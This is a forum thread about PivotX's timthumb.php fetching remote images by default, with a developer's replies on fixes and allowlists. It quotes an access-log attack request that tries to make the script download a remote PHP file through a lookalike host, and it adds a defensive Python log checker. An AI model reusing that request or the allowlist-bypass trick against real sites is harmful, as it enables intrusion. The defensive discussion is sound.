Security: timthumb.php allows cross-site access by default

PostPosted: Sun May 23, 2010 2:47 pm
by mskala
The file pivotx/includes/timthumb.php , which is used for making thumbnails of images, accepts the URL of the image to thumbnail as a query variable. Although the script includes code to check that the specified URL is local, or on a whitelist of allowed URLs, this code is disabled by default. There's a line that says "$allow_remote_all = true;", and as a result, it will accept any URL the user specifies and attempt to download an image from that URL. This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site); or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library. Downloading remote images this way, if it's ever allowed, certainly shouldn't be allowed by default; and the setting is not user-configurable but hardcoded in the script.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Sun May 23, 2010 5:53 pm
by hansfn
Hi and thanks for posting.

I do understand some of your concerns, and I will discuss it with Bob - who just recently enabled/allowed remote images. Unluckily it's not easy to control this using a PivotX config setting since timthumb.php is standalone.

mskala wrote: This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site);

Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

mskala wrote: or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library.

is a scary and much more likely problem.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Tue May 25, 2010 7:19 pm
by hansfn
FYI: We no longer allow remote images by default - changed in revision 2729.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Mon Oct 10, 2011 8:21 am
by scoude
hansfn wrote: Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

Hi,

I just have a hacker using my site with PivotX using this vulnerability ...

[cut by hansfn]

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Mon Oct 10, 2011 8:38 am
by hansfn
This was fixed in PivotX 2.3.0 - did you upgrade?

If you think a similar bug is present in 2.3.0, contact me directly at hansfn@pivotx.net - never disclose such details openly in the forum. Thx :-)

PS! This is a very old thread and your vulnerability isn't the same as the issue discussed in this thread (even if it's related).

Security: timthumb.php

PostPosted: Fri May 20, 2016 9:04 pm
by winters
According to the host, I got a problem with

91.227.5.10 - - [17/May/2016:19:39:57 -0400] "GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" 200 15544 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

pivotx 2.3.11

Does someone know if this can be correct?

thanks!

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Sun May 22, 2016 8:50 pm
by hansfn
No, the default configuration of timthumb.php does not allow fetching files from img.youtube.com.dwell.kz, only from img.youtube.com (and other trusted hosts - see the $ALLOWED_SITES variable).

So, if your host claims that your timthumb.php misbehaves, you have either not updated the file when updating PivotX (it should say "This is timthumb version 2.8.4 - r200" at the beginning of the file) or you have set ALLOW_ALL_EXTERNAL_SITES to true either in timthumb-config.php or in timthumb.php.

NB! The fact that someone tries to attack your timthumb.php doesn't prove or say that there is a vulnerability.
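The log line winters posted and the $ALLOWED_SITES allowlist hansfn points to are worth checking together. The following is an added Python example (not timthumb's or PivotX's own code) that extracts the src= host from such an access-log line and compares a naive substring allowlist check with a strict host-or-subdomain check; the host "img.youtube.com.dwell.kz" passes the first and fails the second, which is the signature of a bypass attempt worth flagging. The ALLOWED_SITES list here is assumed for illustration and need not match the real timthumb default.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample, copied from the access-log line quoted in this thread
# (user-agent shortened).
SAMPLE_LOG = (
    '91.227.5.10 - - [17/May/2016:19:39:57 -0400] '
    '"GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" '
    '200 15544 "-" "Mozilla/5.0"'
)

# Hypothetical allowlist; the real timthumb $ALLOWED_SITES default may differ.
ALLOWED_SITES = ["img.youtube.com", "upload.wikimedia.org"]


def src_host(log_line):
    """Return the lower-cased hostname of the src= parameter of a timthumb
    request found in a combined-format log line, or None if absent."""
    m = re.search(r'"GET (\S+) HTTP/', log_line)
    if not m:
        return None
    query = urlparse(m.group(1)).query
    src = parse_qs(query).get("src")        # parse_qs percent-decodes the value
    if not src:
        return None
    return (urlparse(src[0]).hostname or "").lower()


def naive_allowed(host, allowed=ALLOWED_SITES):
    """Substring match: 'img.youtube.com.dwell.kz' passes because it merely
    contains 'img.youtube.com'. This is the weak form of the check."""
    return any(site in host for site in allowed)


def strict_allowed(host, allowed=ALLOWED_SITES):
    """Exact host, or a subdomain of an allowed host, matched at a label
    boundary so that 'x.img.youtube.com.dwell.kz' cannot sneak through."""
    return any(host == site or host.endswith("." + site) for site in allowed)


def classify(log_line, allowed=ALLOWED_SITES):
    """Return (host, naive_result, strict_result); a True/False split means
    the request would only be accepted by the substring check."""
    host = src_host(log_line)
    if host is None:
        return None
    return host, naive_allowed(host, allowed), strict_allowed(host, allowed)
```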

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Mon May 23, 2016 8:29 pm
by winters
Thank you, Hans.